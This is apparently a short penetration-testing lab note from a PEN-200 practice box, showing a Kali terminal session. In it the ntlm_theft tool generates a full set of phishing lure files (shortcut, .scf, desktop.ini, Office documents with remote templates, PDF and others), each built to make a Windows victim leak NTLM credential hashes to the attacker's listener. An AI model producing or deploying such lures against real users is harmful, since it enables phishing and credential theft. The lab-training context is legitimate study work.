ntlm_theft
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nara/phishing]
└─$ ntlm_theft --generate all --server $tun0 --filename payload
Created: payload/payload.scf (BROWSE TO FOLDER)
Created: payload/payload-(url).url (BROWSE TO FOLDER)
Created: payload/payload-(icon).url (BROWSE TO FOLDER)
Created: payload/payload.lnk (BROWSE TO FOLDER)
Created: payload/payload.rtf (OPEN)
Created: payload/payload-(stylesheet).xml (OPEN)
Created: payload/payload-(fulldocx).xml (OPEN)
Created: payload/payload.htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE)
Created: payload/payload-(includepicture).docx (OPEN)
Created: payload/payload-(remotetemplate).docx (OPEN)
Created: payload/payload-(frameset).docx (OPEN)
Created: payload/payload-(externalcell).xlsx (OPEN)
Created: payload/payload.wax (OPEN)
Created: payload/payload.m3u (OPEN IN WINDOWS MEDIA PLAYER ONLY)
Created: payload/payload.asx (OPEN)
Created: payload/payload.jnlp (OPEN)
Created: payload/payload.application (DOWNLOAD AND OPEN)
Created: payload/payload.pdf (OPEN AND ALLOW)
Created: payload/zoom-attack-instructions.txt (PASTE TO CHAT)
Created: payload/Autorun.inf (BROWSE TO FOLDER)
Created: payload/desktop.ini (BROWSE TO FOLDER)
Generation Complete.Generating NTLM theft payload for phishing on the nara.nara-security.com(192.168.209.30) host.